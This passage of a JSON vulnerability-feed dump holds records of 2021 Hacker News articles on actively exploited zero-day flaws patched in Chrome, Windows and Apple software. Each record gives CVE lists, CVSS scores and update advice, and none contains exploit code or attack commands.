"3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-10-01T03:30:00", "type": "thn", "title": "Update Google Chrome ASAP to Patch 2 New Actively Exploited Zero-Day Flaws", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976"], "modified": "2021-10-05T05:27:09", "id": "THN:50D7C51FE6D69FC5DB5B37402AD0E412", "href": "https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:21", "description": "[](<https://thehackernews.com/images/-9Ndx9Vcrx9E/YHaB5SvoxwI/AAAAAAAACRI/WgbWr7Dgj6sRKNuvNcO4lj-zwEO5CNQdwCLcBGAsYHQ/s0/chrome-zero-day.jpg>)\n\nGoogle on Tuesday released a new version of Chrome web-browsing software for Windows, Mac, and Linux with patches for two newly discovered security vulnerabilities for both of which it says exploits exist in the wild, allowing attackers to engage in active exploitation.\n\nOne of the two flaws concerns an insufficient validation of untrusted input in its V8 JavaScript rendering engine (CVE-2021-21220), which was demonstrated by Dataflow Security's Bruno Keith and Niklas Baumstark at the [Pwn2Own 2021](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>) hacking contest last week.\n\nWhile Google moved to fix the flaw quickly, security researcher Rajvardhan Agarwal published a [working exploit](<https://thehackernews.com/2021/04/rce-exploit-released-for-unpatched.html>) over the weekend by reverse-engineering the patch that the Chromium team pushed to the open-source component, a factor that may have played a crucial role in the release.\n\n**UPDATE:** _Agarwal, in an email to The Hacker News, confirmed that there's [one more vulnerability](<https://twitter.com/r4j0x00/status/1382125720344793090>) affecting Chromium-based browsers that has been patched in the latest version of V8, but has not been included in the Chrome release rolling out today, thereby leaving users potentially vulnerable to attacks even after installing the new update._\n\n\"Even though both the flaws are different in nature, they can be exploited to gain RCE in the renderer process,\" Agarwal told The Hacker News via email. \"I suspect that the first patch was released with the Chrome update because of the published exploit but as the second patch was not applied to Chrome, it can still be exploited.\"\n\nAlso resolved by the company is a [use-after-free](<https://cwe.mitre.org/data/definitions/416.html>) vulnerability in its Blink browser engine (CVE-2021-21206). An anonymous researcher has been credited with reporting the flaw on April 7.\n\n[](<https://thehackernews.com/images/-Co9nqKO9t2I/YHaAjushveI/AAAAAAAACRA/uFUYN6VpoCwJz2lCJEMBEGAwXowVZlR3wCLcBGAsYHQ/s0/chrome-hacking.jpg>)\n\n\"Google is aware of reports that exploits for CVE-2021-21206 and CVE-2021-21220 exist in the wild,\" Chrome Technical Program Manager Prudhvikumar Bommana [noted](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html>) in a blog post.\n\nIt's worth noting that the existence of an exploit is not evidence of active exploitation by threat actors. Since the start of the year, Google has fixed three shortcomings in Chrome that have been under attack, including [CVE-2021-21148](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>), [CVE-2021-21166](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>), and [CVE-2021-21193](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>).\n\nChrome 89.0.4389.128 is expected to roll out in the coming days. Users can update to the latest version by heading to Settings &gt; Help &gt; About Google Chrome to mitigate the risk associated with the flaws.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-14T05:48:00", "type": "thn", "title": "Update Your Chrome Browser to Patch 2 New In-the-Wild 0-Day Exploits", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220"], "modified": "2021-04-14T08:32:40", "id": "THN:F197A729A4F49F957F9D5910875EBAAA", "href": "https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:48", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEibt_uA0VwMgumOtohRzrBSD-Inv5dv71ZMU1Hu4XYJFQxp8FVjEZzeLUuvttUyYx1xMxQJ16Nfw5Jdc7mPLfwoGoTeZqrLRMZ005Eu673XGL_uJrq7LDUpWojmmmN1YHSwVQcJQzL28acTco05Z7auS001HlgSR96GjvrE5gDr2M123luTRVFTFcAT>)\n\nGoogle has rolled out fixes for five security vulnerabilities in its Chrome web browser, including one which it says is being exploited in the wild, making it the [17th such weakness](<https://thehackernews.com/2021/10/google-releases-urgent-chrome-update-to.html>) to be disclosed since the start of the year.\n\nTracked as [CVE-2021-4102](<https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop_13.html>), the flaw relates to a [use-after-free bug](<https://cwe.mitre.org/data/definitions/416.html>) in the V8 JavaScript and WebAssembly engine, which could have severe consequences ranging from corruption of valid data to the execution of arbitrary code. An anonymous researcher has been credited with discovering and reporting the flaw.\n\nAs it stands, it's not known how the weakness is being abused in real-world attacks, but the internet giant issued a terse statement that said, \"it's aware of reports that an exploit for CVE-2021-4102 exists in the wild.\" This is done so in an attempt to ensure that a majority of users are updated with a fix and prevent further exploitation by other threat actors.\n\nCVE-2021-4102 is the second use-after-free vulnerability in V8 the company has remediated in less than three months following reports of active exploitation, with the previous vulnerability [CVE-2021-37975](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>), also reported by an anonymous researcher, plugged in an update it shipped on September 30. It's not immediately clear if the two flaws bear any relation to one another.\n\nWith this latest update, Google has addressed a record 17 zero-days in Chrome this year alone \u2014\n\n * [CVE-2021-21148](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [CVE-2021-21166](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [CVE-2021-21193](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [CVE-2021-21206](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [CVE-2021-21220](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [CVE-2021-30551](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [CVE-2021-30554](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [CVE-2021-30563](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n * [CVE-2021-30632](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Out of bounds write in V8\n * [CVE-2021-30633](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Use-after-free in Indexed DB API\n * [CVE-2021-37973](<https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html>) \\- Use-after-free in Portals \n * [CVE-2021-37975](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>) \\- Use-after-free in V8\n * [CVE-2021-37976](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>) \\- Information leak in core\n * [CVE-2021-38000](<https://thehackernews.com/2021/10/google-releases-urgent-chrome-update-to.html>) \\- Insufficient validation of untrusted input in Intents\n * [CVE-2021-38003](<https://thehackernews.com/2021/10/google-releases-urgent-chrome-update-to.html>) \\- Inappropriate implementation in V8\n\nChrome users are recommended to update to the latest version (96.0.4664.110) for Windows, Mac, and Linux by heading to Settings &gt; Help &gt; 'About Google Chrome' to mitigate any potential risk of active exploitation.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-12-14T04:13:00", "type": "thn", "title": "Update Google Chrome to Patch New Zero-Day Exploit Detected in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-4102"], "modified": "2021-12-14T04:30:59", "id": "THN:4CC79A3CEFEDEB0DC9CF87C5B9035209", "href": "https://thehackernews.com/2021/12/update-google-chrome-to-patch-new-zero.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:09", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgMs77BPvPvj6P-3E7i08R8I_ixvGQZgvS5p1CxbhBqiARNzNLx3R6X1fYdCRjiQmZfLY3-6HUY_hPXAucE_jFVypFTV0HG0XIru72uSOfwfn3mMcLC9j6XyeOCF7We4fYjthQ17-YmGUSvhPWEOlnBXakT_9U8IYdpMKEB6GeCFMJI8ihho5D-6JUO>)\n\nGoogle on Thursday rolled out an emergency update for its Chrome web browser, including fixes for two zero-day vulnerabilities that it says are being actively exploited in the wild.\n\nTracked as **CVE-2021-38000** and **CVE-2021-38003**, the weaknesses relate to insufficient validation of untrusted input in a feature called Intents as well as a case of inappropriate implementation in V8 JavaScript and WebAssembly engine. The internet giant's Threat Analysis Group (TAG) has been credited with discovering and reporting the two flaws on September 15, 2021, and October 26, 2021, respectively.\n\n\"Google is aware that exploits for CVE-2021-38000 and CVE-2021-38003 exist in the wild,\" the company [noted](<https://chromereleases.googleblog.com/2021/10/stable-channel-update-for-desktop_28.html>) in an advisory without delving into technical specifics about how the two vulnerabilities were used in attacks or the threat actors that may have weaponized them.\n\nAlso addressed as part of this stable channel update is a [use-after-free](<https://cwe.mitre.org/data/definitions/416.html>) vulnerability in the Web Transport component (CVE-2021-38002), which was demonstrated for the first time at the [Tianfu Cup](<https://thehackernews.com/2021/10/windows-10-linux-ios-chrome-and-many.html>) contest held earlier this month in China. With these patches, Google has resolved a record 16 zero-days in the web browser since the start of the year \u2014\n\n * [**CVE-2021-21148**](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [**CVE-2021-21193**](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21206**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21220**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [**CVE-2021-21224**](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [**CVE-2021-30551**](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [**CVE-2021-30554**](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [**CVE-2021-30563**](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n * [**CVE-2021-30632**](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Out of bounds write in V8\n * [**CVE-2021-30633**](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Use-after-free in Indexed DB API\n * [**CVE-2021-37973**](<https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html>) \\- Use-after-free in Portals\n * [**CVE-2021-37975**](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>) \\- Use-after-free in V8\n * [**CVE-2021-37976**](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>) \\- Information leak in core\n\nChrome users are advised to update to the latest version (95.0.4638.69) for Windows, Mac, and Linux by heading to Settings &gt; Help &gt; 'About Google Chrome' to mitigate any potential risk of active exploitation.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-10-29T04:08:00", "type": "thn", "title": "Google Releases Urgent Chrome Update to Patch 2 Actively Exploited 0-Day Bugs", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38002", "CVE-2021-38003"], "modified": "2021-10-29T04:08:52", "id": "THN:B7217784F9D53002315C9C43CCC73766", "href": "https://thehackernews.com/2021/10/google-releases-urgent-chrome-update-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:59", "description": "[](<https://thehackernews.com/images/-Oinzu8T6SmI/YMBZ7WkhbJI/AAAAAAAACzI/kVA4Ura4Yl4MrNb_jPNPBtgjkBj1DSs1wCLcBGAsYHQ/s0/microsoft-windows-update.jpg>)\n\nMicrosoft on Tuesday released another round of [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jun>) for Windows operating system and other supported software, squashing 50 vulnerabilities, including six zero-days that are said to be under active attack.\n\nThe flaws were identified and resolved in Microsoft Windows, .NET Core and Visual Studio, Microsoft Office, Microsoft Edge (Chromium-based and EdgeHTML), SharePoint Server, Hyper-V, Visual Studio Code - Kubernetes Tools, Windows HTML Platform, and Windows Remote Desktop.\n\nOf these 50 bugs, five are rated Critical, and 45 are rated Important in severity, with three of the issues publicly known at the time of release. The vulnerabilities that being actively exploited are listed below -\n\n * [**CVE-2021-33742**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) (CVSS score: 7.5) - Windows MSHTML Platform Remote Code Execution Vulnerability\n * [**CVE-2021-33739**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33739>) (CVSS score: 8.4) - Microsoft DWM Core Library Elevation of Privilege Vulnerability\n * [**CVE-2021-31199**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>) (CVSS score: 5.2) - Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability\n * [**CVE-2021-31201**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) (CVSS score: 5.2) - Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability\n * [**CVE-2021-31955**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) (CVSS score: 5.5) - Windows Kernel Information Disclosure Vulnerability\n * [**CVE-2021-31956**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) (CVSS score: 7.8) - Windows NTFS Elevation of Privilege Vulnerability\n\nMicrosoft didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting them. But the fact that four of the six flaws are privilege escalation vulnerabilities suggests that attackers could be leveraging them as part of an infection chain to gain elevated permissions on the targeted systems to execute malicious code or leak sensitive information.\n\nThe Windows maker also noted that both CVE-2021-31201 and CVE-2021-31199 address flaws related to [CVE-2021-28550](<https://thehackernews.com/2021/05/alert-hackers-exploit-adobe-reader-0.html>), an arbitrary code execution vulnerability rectified by Adobe last month that it said was being \"exploited in the wild in limited attacks targeting Adobe Reader users on Windows.\"\n\nGoogle's Threat Analysis Group, which has been acknowledged as having reported CVE-2021-33742 to Microsoft, [said](<https://twitter.com/ShaneHuntley/status/1402320072123719690>) \"this seem[s] to be a commercial exploit company providing capability for limited nation state Eastern Europe / Middle East targeting.\"\n\nRussian cybersecurity firm Kaspersky, for its part, detailed that CVE-2021-31955 and CVE-2021-31956 were abused in a Chrome zero-day exploit chain ([CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>)) in a series of highly targeted attacks against multiple companies on April 14 and 15. The intrusions were attributed to a new threat actor dubbed \"PuzzleMaker.\"\n\n\"While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an elevation of privilege (EoP) exploit that was used to escape the sandbox and obtain system privileges,\" Kaspersky Lab researchers [said](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\nElsewhere, Microsoft fixed numerous remote code execution vulnerabilities spanning Paint 3D, Microsoft SharePoint Server, Microsoft Outlook, Microsoft Office Graphics, Microsoft Intune Management Extension, Microsoft Excel, and Microsoft Defender, as well as several privilege escalation flaws in Microsoft Edge, Windows Filter Manager, Windows Kernel, Windows Kernel-Mode Driver, Windows NTLM Elevation, and Windows Print Spooler.\n\nTo install the latest security updates, Windows users can head to Start &gt; Settings &gt; Update &amp; Security &gt; Windows Update or by selecting Check for Windows updates.\n\n### Software Patches From Other Vendors\n\nAlongside Microsoft, a number of other vendors have also released a slew of patches on Tuesday, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-06-01>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Intel](<https://blogs.intel.com/technology/2021/06/intel-security-advisories-for-june-2021/>)\n * Linux distributions [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-June/thread.html>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), and [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999>) (with cybersecurity firm Onapsis [credited](<https://onapsis.com/blog/sap-security-patch-day-june-2021-multiple-memory-corruption-vulnerabilities-can-lead-system>) with identifying 20 of the 40 remediated flaws)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-09T06:07:00", "type": "thn", "title": "Update Your Windows Computers to Patch 6 New In-the-Wild Zero-Day Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-09T16:52:54", "id": "THN:1DDE95EA33D4D9F304973569FC787451", "href": "https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:57", "description": "[](<https://thehackernews.com/images/-EY0jLibkpcU/YMgfQajFNQI/AAAAAAAAC3I/EIU5a5Wq51o-5TvSYm6aKt_vlbbskE6UACLcBGAsYHQ/s0/apple-zero-day.png>)\n\nApple on Monday shipped out-of-band security patches to address two zero-day vulnerabilities in iOS 12.5.3 that it says are being actively exploited in the wild.\n\nThe latest update, [iOS 12.5.4](<https://support.apple.com/en-us/HT212548>), comes with fixes for three security bugs, including a memory corruption issue in [ASN.1 decoder](<https://en.wikipedia.org/wiki/ASN.1>) (CVE-2021-30737) and two flaws concerning its WebKit browser engine that could be abused to achieve remote code execution \u2014\n\n * **CVE-2021-30761** \\- A memory corruption issue that could be exploited to gain arbitrary code execution when processing maliciously crafted web content. The flaw was addressed with improved state management.\n * **CVE-2021-30762** \\- A use-after-free issue that could be exploited to gain arbitrary code execution when processing maliciously crafted web content. The flaw was resolved with improved memory management.\n\nBoth CVE-2021-30761 and CVE-2021-30762 were reported to Apple anonymously, with the Cupertino-based company stating in its advisory that it's aware of reports that the vulnerabilities \"may have been actively exploited.\" As is usually the case, Apple didn't share any specifics on the nature of the attacks, the victims that may have been targeted, or the threat actors that may be abusing them.\n\nOne thing evident, however, is that the active exploitation attempts were directed against owners of older devices such as iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation). The move mirrors a similar fix that Apple rolled out on May 3 to remediate a buffer overflow vulnerability (CVE-2021-30666) in WebKit targeting the same set of devices.\n\nAlong with the two aforementioned flaws, Apple has patched a total of 12 zero-days affecting iOS, iPadOS, macOS, tvOS, and watchOS since the start of the year \u2014\n\n * [**CVE-2021-1782**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (Kernel) - A malicious application may be able to elevate privileges\n * [**CVE-2021-1870**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution\n * [**CVE-2021-1871**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution\n * [**CVE-2021-1879**](<https://thehackernews.com/2021/03/apple-issues-urgent-patch-update-for.html>) (WebKit) - Processing maliciously crafted web content may lead to universal cross-site scripting\n * [**CVE-2021-30657**](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (System Preferences) - A malicious application may bypass Gatekeeper checks\n * [**CVE-2021-30661**](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (WebKit Storage) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30663**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30665**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30666**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30713**](<https://thehackernews.com/2021/05/apple-issues-patches-to-combat-ongoing.html>) (TCC framework) - A malicious application may be able to bypass Privacy preferences\n\nUsers of Apple devices are recommended to update to the latest versions to mitigate the risk associated with the vulnerabilities.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-15T03:32:00", "type": "thn", "title": "Apple Issues Urgent Patches for 2 Zero-Day Flaws Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30737", "CVE-2021-30761", "CVE-2021-30762"], "modified": "2021-06-15T10:08:36", "id": "THN:0D13405795D42B516C33D8E56A44BA9D", "href": "https://thehackernews.com/2021/06/apple-issues-urgent-patches-for-2-zero.html", "cvss": {"score": 7.5, "vector": 